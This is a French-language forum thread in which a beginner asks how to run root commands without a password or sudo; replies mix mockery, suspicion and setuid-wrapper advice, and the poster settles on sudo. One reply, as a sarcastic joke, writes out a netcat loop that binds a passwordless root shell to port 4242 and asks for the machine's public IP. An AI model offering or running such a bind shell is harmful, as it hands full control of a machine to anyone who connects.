Bonjour à tous,
 
Débutant, je cherche à écrire un script qui me permettrait de killer des process ou d'effectuer des rm sur des fichiers/dossiers qui ne m'impartiennet pas. Pour cela il me faut des droits root. Pour le moment pas de problème.  
Si j'utilise un su, on me demande le mot de passe root. Voilà le début des soucis. Je ne veux pas que la demande du mot de passe root est lieu. Il faudrait que ce soit transparent.
Quelqu'un aurait une idée pour me dépanner???
P.S : je ne souhaite pas non plus utilisé SUDO...( ça complique les choses, non?? )  

sudo complique les choses non pourquoi ?

je ne peux pas installer sudo, c'est pour cela que je cherche une autre solution...quelqu'un a une idée???

tu peux pas installer sudo ? pourquoi
 
non passke sinon, tu peux passer tous tes exécutables en suid-root ! l'avantage c'est que c'est pas dangereux du tout !
 

sudo / ssh

Et c'est compliqué à mettre en place SUDO?????
comment on installe ça???

attends (1) tu peux ou tu peux pas l'installer ? si tu peux pas l'installer ça va être impossible de l'installer hein... (ce qu'on est pas obligé de dire ici... )
(2) c'est quoi ta distribution linux ?

 
Tout ça ne me dit rien qui vaille.
 
Mais rions un peu. Un programme python qui écoute sur un port fera très bien l'affaire. Tu le lances avec les droits root et il se charge de réécire et exécuter la commande que tu lui passes.
 
Et pourquoi tu ne peux pas installer sudo ? parce que tu n'est pas root ?

ça sent bizarre ce topic.

un rootkit koi...

moi je vote pour un:
while [ 1 ] ; do netcat -e /bin/bash -l -p 4242 ; done
tu lances ça en root... et voilà ! tu n'as plus qu'à te connecter avec netcat:  
netcat localhost 4242
et tu as un shell root sans jamais taper de mot de passe !
ensuite, oublies pas d'envoyer l'adresse IP publique (si yen a une...) de cette machine, qu'on puisse vérifier que ça marche bien !

ou file-nous le mot de passe root directement, on peut te faire ça à distance pour pas cher.

sinon tu peux m'envoyer la bécane par la poste aussi...

ok les gars...merci je vois. Bon bas je vais faire le forcing pour sudo...je vous recontacterais pour m'aider à la configurer )

...

Tu peux créer un petit binaire setuid root qui ne fais rien d'autre qu'exécuter ton script. En fait si ton script a les droits 700, et si ton binaire appartient à un utilisateur (pas root) et a les droits 4700, c'est pas trop dangereux comme solution : tu es le seul à pouvoir exécuter le binaire, et root est le seul a pouvoir exécuter le script.
 
Edit : en fait en y repensant c'est même probablement la solution la plus sure (à condition que tu saches faire un programme C de quelques lignes sans faille de sécurité). A la limite c'est même plus sûr que sudo, qui revient finalement au même (sudo est setuid root), mais qui est infiniment plus compliqué et a plus de chances d'être buggué.

Bonjour je voudrais devenir hacker sans connaitre unix vous pouvez m'aider ?
 
Juste pour rester dans l'esprit de ce topic fort lolesque.

faut bien commencer un jour...

Déjà, oublie le script et fais un programme en C (sans être loggé en root). Compile-le (avec gcc) et tu obtiens un fichier binaire (par binaire, je veux dire : "contenant des instructions directement compréhensibles par le processeur" ). Ensuite, tu te logges en root (commande : su) et tu fais appartenir fichier_binaire à root (commande : chown root fichier_binaire). Ensuite, tu fais en sorte que lorsque le noyau fait un exec de fichier_binaire, il modifie le propriétaire du processus (qui a demandé l'exec) en lui affectant le propriétaire de fichier_binaire (commande : chmod +s fichier_binaire). Tu n'as plus besoin d'être root : fermer le flux en appuyant sur [Ctrl]+[D]. Ca devrait marcher !
 
Pourquoi faire absolument un fichier binaire ? Lorsque le noyau fait un exec, c'est forcément un exec d'un fichier binaire. Si tu exécutes un script, le noyau va faire un exec de l'interpréteur de commandes capable de comprendre le script. Dans ton cas, il fera sûrement un exec de bash, qui ne va évidemment pas te donner les droits du root.

Merci les gars. Finallement j'ai utilisé SUDO lol ;o)